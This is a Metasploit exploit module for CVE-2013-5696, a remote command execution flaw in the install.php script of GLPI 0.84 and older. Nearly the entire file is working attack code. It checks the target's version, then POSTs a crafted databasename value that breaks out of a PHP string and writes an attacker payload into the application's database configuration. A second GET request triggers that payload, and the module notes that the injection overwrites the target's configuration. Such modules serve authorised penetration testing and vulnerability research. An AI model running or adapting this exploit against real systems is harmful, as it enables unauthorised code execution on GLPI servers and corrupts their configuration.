##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking # Application database configuration is overwritten

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'GLPI install.php Remote Command Execution',
        'Description' => %q{
          This module exploits an arbitrary command execution vulnerability in the
          GLPI 'install.php' script. This module is set to ManualRanking due to this
          module overwriting the target database configuration, which may introduce target
          instability.
        },
        'Author' => [
          'Tristan Leiter < research[at]navixia.com >', # Navixia Research Team
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2013-5696' ],
          [ 'URL', 'https://www.navixia.com/blog/entry/navixia-finds-critical-vulnerabilities-in-glpi-cve-2013-5696.html' ],
          [ 'URL', 'http://www.glpi-project.org/forum/viewtopic.php?id=33762' ],
        ],
        'Privileged' => false,
        'Platform' => ['php'],
        'Payload' => {
          'Space' => 4000,
          'BadChars' => "#",
          'DisableNops' => true,
          'Keys' => ['php']
        },
        'Arch' => ARCH_PHP,
        'Targets' => [[ 'GLPI 0.84 or older', {}]],
        'DisclosureDate' => '2013-09-12',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to GLPI', '/glpi/'])
      ]
    )
  end

  def uri
    return target_uri.path
  end

  def check
    # Check if the GLPI instance is vulnerable
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, 'index.php'),
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Safe
    end

    re = '(version)(\\s+)(.*)(\\s+)(Copyright)'
    m = Regexp.new(re, Regexp::IGNORECASE)
    matched = m.match(res.body)
    if matched and matched[3] =~ /0.(8[0-4].[0-1])|([0-7][0-9].[0-9])/
      vprint_good("Detected Version : #{matched[3]}")
      return Exploit::CheckCode::Appears
    elsif matched
      vprint_error("Version #{matched[3]} is not vulnerable")
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Injecting the payload...")
    rand_arg = Rex::Text.rand_text_hex(10)
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'install/install.php'),
      'vars_post' =>
      {
        'install' => 'update_1',
        'db_host' => 'localhost',
        'db_user' => 'root',
        'db_pass' => 'root',
        'databasename' => "'; } if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } /*"
      }
    })

    unless res and res.code == 200 and res.body =~ /You will update the GLPI database/
      print_warning("Unexpected response while injecting the payload, trying to execute anyway...")
    end

    print_status("Executing the payload...")
    send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, 'index.php'),
      'vars_get' =>
      {
        rand_arg => '1',
      }
    })
  end
end
